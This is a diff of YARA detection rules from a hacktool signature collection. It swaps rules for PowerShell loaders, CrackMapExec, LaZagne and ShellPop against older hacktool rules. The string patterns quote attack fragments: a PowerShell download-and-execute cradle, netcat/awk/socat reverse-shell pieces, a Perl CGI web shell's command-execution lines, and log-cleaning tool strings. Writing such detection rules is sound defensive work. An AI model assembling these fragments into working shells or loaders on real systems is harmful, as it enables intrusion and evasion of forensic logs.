-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4059-L4074"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2136-L2155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ef174008517b101be844e30890626378f49a275bad3f08ce25fb8d6118c77c3"
-		score = 75
+		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
+		logic_hash = "1e41c38da7552d6a25c918547a39ed07ec38a537fd04e2090d1199c4fb0e3b1e"
+		score = 40
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b36d3ca7073741c8a48c578edaa6d3b6a8c3c4413e961a83ad08ad128b843e0b"
 
 	strings:
-		$s1 = "[*] Looks like we're 64bit, using regular powershell.exe" ascii wide
-		$s2 = "[*] Kicking off download cradle in a new process"
-		$s3 = "Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+''');'"
+		$s0 = "Permission denial to EXEC command.:(" ascii
+		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
+		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
+		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
+		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii
+		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii
+		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
 
 	condition:
-		( filesize < 20KB and 1 of them )
+		4 of them
 }
-rule SIGNATURE_BASE_Powershell_Mal_Hacktool_Gen : FILE
+rule SIGNATURE_BASE_Aspack_ASPACK
 {
 	meta:
-		description = "Detects PowerShell hack tool samples - generic PE loader"
+		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d1fc4594-d816-5d02-bff6-3f220477b555"
-		date = "2017-11-02"
+		id = "ca9a25f9-a94b-5e10-b935-c6e2d38d999c"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4076-L4092"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2157-L2172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "273222cde3ff155cef09c25192dcb4865179e8172e625fe8f43b21a13fe1a170"
-		score = 75
+		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
+		logic_hash = "1c7abc0a126ee8c8b20e55ad85974067f1a230efc5f95a1a1e732025e39d5bab"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d442304ca839d75b34e30e49a8b9437b5ab60b74d85ba9005642632ce7038b32"
 
 	strings:
-		$x1 = "$PEBytes32 = 'TVqQAAMAAAAEAAAA" wide
-		$x2 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword wide
-		$x3 = "@($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword wide
-		$x4 = "(Shellcode: LoadLibraryA.asm)" fullword wide
+		$s0 = "ASPACK.EXE" fullword wide
+		$s5 = "CLOSEDFOLDER" fullword wide
+		$s10 = "ASPack compressor" fullword wide
 
 	condition:
-		filesize < 8000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sig_Remoteadmin_1 : FILE
+rule SIGNATURE_BASE_Sig_238_2323
 {
 	meta:
-		description = "Detects strings from well-known APT malware"
+		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da55084c-ec1f-5800-a614-189dce7b5820"
-		date = "2017-12-03"
+		id = "445f6a49-51e6-5eb8-ae08-e5989aafb6c4"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4094-L4108"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2174-L2192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "81912bbfc1f6ac3ec7c54fc935b9ed531c97ad509cf2c096a19e638836cd0baf"
-		score = 45
+		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
+		logic_hash = "1278c53f64a0ba7f3f6a728237eac6808b260ad36551923276bfba9b36586870"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "Radmin, Remote Administrator" wide
-		$ = "Radmin 3.0" wide
+		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
+		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
+		$s3 = "Failed to execute shell" fullword ascii
+		$s5 = "/h   - Hide Window" fullword ascii
+		$s7 = "Accepted connection from client at %s" fullword ascii
+		$s9 = "Error %d: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Remcom_Remotecommandexecution
+rule SIGNATURE_BASE_Jc_ALL_Wineggdropshell_Rar_Folder_Install_2
 {
 	meta:
-		description = "Detects strings from RemCom tool"
+		description = "Disclosed hacktool set (old stuff) - file Install.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "90b4ce3c-a690-5b6e-95e8-7e5dc8270152"
-		date = "2017-12-28"
+		id = "ebfc8e53-328c-5deb-bf9b-e0270f171c68"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://goo.gl/tezXZt"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4110-L4125"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2194-L2212"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c39a09c8d0c1799febcb4d9eafece43f8b21e7ffc277fdfad6c235eb1a201697"
-		score = 50
+		hash = "95866e917f699ee74d4735300568640ea1a05afd"
+		logic_hash = "9c12e8491918a656e37b4ee6c3a42ec970cb6cf101ca5fe3fdfe9eab16526219"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "\\\\.\\pipe\\%s%s%d"
-		$ = "%s\\pipe\\%s%s%d%s"
-		$ = "\\ADMIN$\\System32\\%s%s"
+		$s1 = "http://go.163.com/sdemo" fullword wide
+		$s2 = "Player.tmp" fullword ascii
+		$s3 = "Player.EXE" fullword wide
+		$s4 = "mailto:sdemo@263.net" fullword ascii
+		$s5 = "S-Player.exe" fullword ascii
+		$s9 = "http://www.BaiXue.net (" wide
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Crackmapexec_EXE : FILE
+rule SIGNATURE_BASE_Sig_238_TFTPD32
 {
 	meta:
-		description = "Detects CrackMapExec hack tool"
+		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9fcfba98-7ba1-5810-99b7-62ad2b1aa4c0"
-		date = "2018-04-06"
+		id = "071fba15-affe-539a-bcc0-c14943fff51a"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4127-L4143"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2214-L2235"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa05fa41d6aaed45a9b44806a310fdb584874f7eb382e576b36e6d1db87cef88"
-		score = 85
+		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
+		logic_hash = "cbf239330f8f1fd8be3ef3c93571c723447ca3b814fb7c1eff5ea4b2e7f5364f"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
 
 	strings:
-		$s1 = "core.scripts.secretsdump(" ascii
-		$s2 = "core.scripts.samrdump(" ascii
-		$s3 = "core.uacdump(" ascii
+		$s0 = " http://arm.533.net" fullword ascii
+		$s1 = "Tftpd32.hlp" fullword ascii
+		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
+		$s3 = "TFTPD32 -- " fullword wide
+		$s4 = "%d -- %s" fullword ascii
+		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
+		$s12 = "TftpPort" fullword ascii
+		$s13 = "Ttftpd32BackGround" fullword ascii
+		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 2 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_SUSP_Imphash_Passrevealer_PY_EXE : FILE
+rule SIGNATURE_BASE_Sig_238_Iecv
 {
 	meta:
-		description = "Detects an imphash used by password revealer and hack tools (some false positives with hardware driver installers)"
+		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9462dfc4-2feb-591d-ac0c-ba02f093c216"
-		date = "2018-04-06"
-		modified = "2021-11-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4145-L4163"
+		id = "08126db3-267b-5289-b562-40bc264f6e3e"
+		date = "2014-11-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2237-L2254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "684e901eebf47e2bd8b25fd302963c2761376ce4754d74f9e6f1eb3024c89144"
-		score = 40
+		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
+		logic_hash = "e2985d85030d88cb63eb8b80673812f85aea6e11c6aeb430387cdb8886958b6a"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$fp1 = "Assmann Electronic GmbH" ascii wide
-		$fp2 = "Oculus VR" ascii wide
-		$fp3 = "efm8load" ascii
+		$s1 = "Edit The Content Of Cookie " fullword wide
+		$s3 = "Accessories\\wordpad.exe" fullword ascii
+		$s4 = "gorillanation.com" fullword ascii
+		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
+		$s12 = "http://nirsoft.cjb.net" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and pe.imphash ( ) == "ed61beebc8d019dd9bec823e2d694afd" and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Unknown_Pwdumper_Apr18_3 : FILE
+rule SIGNATURE_BASE_Antiy_Ports_1_21
 {
 	meta:
-		description = "Detects sample from unknown sample set - IL origin"
+		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2431d562-dcd8-5d21-8406-7d2567b6eca9"
-		date = "2018-04-06"
+		id = "eb53fc91-4dec-5416-a2c7-1e8256297886"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4165-L4184"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2256-L2271"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf0dff02bdfa239336b2bc865f2a9aed6d20cafb059caa87a60aa30269dd94b5"
-		score = 75
+		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
+		logic_hash = "fb175c413faf0ca33cf166029b217aac31126d6cabc81883c16b2de2ab00c16c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d435e7b6f040a186efeadb87dd6d9a14e038921dc8b8658026a90ae94b4c8b05"
-		hash2 = "8c35c71838f34f7f7a40bf06e1d2e14d58d9106e6d4e6f6e9af732511a126276"
 
 	strings:
-		$s1 = "loaderx86.dll" fullword ascii
-		$s2 = "tcpsvcs.exe" fullword wide
-		$s3 = "%Program Files, Common FOLDER%" fullword wide
-		$s4 = "%AllUsers, ApplicationData FOLDER%" fullword wide
-		$s5 = "loaderx86" fullword ascii
-		$s6 = "TNtDllHook$" fullword ascii
+		$s0 = "AntiyPorts.EXE" fullword wide
+		$s7 = "AntiyPorts MFC Application" fullword wide
+		$s20 = " @Stego:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Processinjector_Gen : HIGHVOL FILE
+rule SIGNATURE_BASE_Perlcmd_Zip_Folder_Cmd
 {
 	meta:
-		description = "Detects a process injection utility that can be used ofr good and bad purposes"
+		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b0b6ac7-8432-5f93-b389-c2356ec75113"
-		date = "2018-04-23"
+		id = "19e4eca0-bd56-57af-afd2-ee2fc5c7c0df"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4186-L4207"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2273-L2293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "90d200e79c97911b105e592549bc2c04fb09ce841413c30117d421b45bb9988c"
+		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
+		logic_hash = "4391207d66b7ed5ac2db127d3efcf22f8c2bbd0ee1f0c6982d656b91e5e10c8f"
 		score = 60
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d"
 
 	strings:
-		$x1 = "Error injecting remote thread in process:" fullword ascii
-		$s5 = "[-] Error getting access to process: %ld!" fullword ascii
-		$s6 = "--process-name <name>  Process name to inject" fullword ascii
-		$s12 = "No injection target has been provided!" fullword ascii
-		$s17 = "[-] An app path is required when not injecting!" fullword ascii
+		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
+		$s1 = "s/%20/ /ig;" fullword ascii
+		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
+		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
+		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
+		$s6 = "$execthis = $_;" fullword ascii
+		$s7 = "system($execthis);" fullword ascii
+		$s12 = "s/%2f/\\//ig;" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and ( pe.imphash ( ) == "d27e0fa013d7ae41be12aaf221e41f9b" or 1 of them ) or 3 of them
+		6 of them
 }
-rule SIGNATURE_BASE_Lazagne_PW_Dumper
+rule SIGNATURE_BASE_Aspbackdoor_Asp3
 {
 	meta:
-		description = "Detects Lazagne PW Dumper"
-		author = "Markus Neis / Florian Roth"
-		id = "1904029e-9336-5278-ae2e-4bc853316600"
-		date = "2018-03-22"
+		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ed86e829-449b-5088-a105-f1fe79547540"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/AlessandroZ/LaZagne/releases/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4209-L4223"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2295-L2315"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2eac81d5cecdaca7eeaa83be70a688a595f8bbf54679ee565ba325b9e384552b"
-		score = 70
+		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
+		logic_hash = "c62ae1d32e93a8614a8288ce2df8e26806ab67b3b133067182f0396f0f080b78"
+		score = 60
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Crypto.Hash" fullword ascii
-		$s2 = "laZagne" fullword ascii
-		$s3 = "impacket.winregistry" fullword ascii
+		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
+		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
+		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
+		$s14 = " Windows NT " fullword ascii
+		$s16 = " WIndows 2000 " fullword ascii
+		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
+		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
+		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Tclsh : FILE
+rule SIGNATURE_BASE_Sig_238_Fpipe
 {
 	meta:
-		description = "Detects suspicious TCLsh popshell"
-		author = "Tobias Michalski"
-		id = "24f6b626-383e-54c9-abd4-bd67c37af937"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0b2f11d9-a919-5790-8724-d2f028e4fa3a"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4225-L4237"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2317-L2335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "622805e8067f5158d82783971dcf31e8db05f1d52a38bd1ec3e76ddbbd78032b"
-		score = 65
+		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
+		logic_hash = "ecf143c231aeb37cf9575c3ea8db83c9a049e85a7c95668deeac0878f9c30b9c"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "9f49d76d70d14bbe639a3c16763d3b4bee92c622ecb1c351cb4ea4371561e133"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "{ puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if" ascii
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s3 = " -s    - outbound source port number" fullword ascii
+		$s5 = "http://www.foundstone.com" fullword ascii
+		$s20 = "Attempting to connect to %s port %d" fullword ascii
 
 	condition:
-		filesize < 1KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Ruby : FILE
+rule SIGNATURE_BASE_Sig_238_Concon
 {
 	meta:
-		description = "Detects suspicious ruby shellpop"
-		author = "Tobias Michalski"
-		id = "cb3a93d5-02a1-5a49-b37e-3f9312b993ea"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file concon.com"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ca7862cc-1053-5fce-a569-6ecc069314df"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4239-L4251"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2337-L2350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa076540ef01d04117d3340f4d84c21f79acfc558ed4aa585d801b6a6bc797a2"
-		score = 65
+		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
+		logic_hash = "c45955cc59970657f8787ddc0e549939d2fa30d11cfd19fd12cd9067abb3bcd6"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "6b425b37f3520fd8c778928cc160134a293db0ce6d691e56a27894354b04f783"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ");while(cmd=c.gets);IO.popen(cmd,'r'){" ascii
+		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Awk : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Regdll
 {
 	meta:
-		description = "Detects suspicious AWK Shellpop"
-		author = "Tobias Michalski"
-		id = "92d1e6dd-d758-5df2-b5e5-eb275964551d"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37096c50-68d0-5412-847a-022062a5ff2a"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4253-L4266"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2352-L2368"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d676ffbd1ce083a1b8e34576125fb0805caef4423089cd72a92483467669b78"
-		score = 65
+		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
+		logic_hash = "89606ccf4341ba9451fd1bfbc818bbcd55d45d50e06f09b9f1ecd8efb3c322af"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "7513a0a0ba786b0e22a9a7413491b4011f60af11253c596fa6857fb92a6736fc"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "awk 'BEGIN {s = \"/inet/tcp/0/" ascii
-		$s2 = "; while(42) " ascii
+		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
+		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
+		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
+		$s5 = "Public Property Get oFS()" fullword ascii
 
 	condition:
-		filesize < 1KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Netcat_UDP : FILE
+rule SIGNATURE_BASE_Cleaniislog
 {
 	meta:
-		description = "Detects suspicious netcat popshell"
-		author = "Tobias Michalski"
-		id = "67aa53b6-00bc-5d2e-b6f3-37e9121cdd01"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "439726c6-3262-59ef-9a54-7dcd98cf924d"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4268-L4281"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2370-L2391"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c85b1275ccf5bbc7f6e0ab0f1fa9d1bce7d56912411f84f9946163191c79576"
-		score = 65
+		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
+		logic_hash = "77a26e57b36f73d4d2730bc3a4d8485718119e2ccc80b40de3515ec688616eb9"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "d823ad91b315c25893ce8627af285bcf4e161f9bbf7c070ee2565545084e88be"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "mkfifo fifo ; nc.traditional -u" ascii
-		$s2 = "< fifo | { bash -i; } > fifo" fullword ascii
+		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
+		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
+		$s8 = "CleanIISLog Ver" fullword ascii
+		$s9 = "msftpsvc" fullword ascii
+		$s10 = "Fatal Error: MFC initialization failed" fullword ascii
+		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
+		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
+		$s16 = "Service %s Stopped." fullword ascii
+		$s20 = "Process Log File %s..." fullword ascii
 
 	condition:
-		filesize < 1KB and 1 of them
+		5 of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Socat : FILE
+rule SIGNATURE_BASE_Sqlcheck
 {
 	meta:
-		description = "Detects suspicious socat popshell"
-		author = "Tobias Michalski"
-		id = "23c331ba-217c-5b17-b45e-d553eea76a56"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a72d38ef-b2e7-5051-8538-724d9e95fa6a"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4283-L4296"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2393-L2410"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "48c06096b27be11ae12cc38294acb495b739101cabc04e89eb76e93fb42c52df"
-		score = 65
+		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
+		logic_hash = "e9c1d7cabe7236e059f4bfec917ca00c47a3db955746ebfcda0f5e733de359c7"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "267f69858a5490efb236628260b275ad4bbfeebf4a83fab8776e333ca706a6a0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
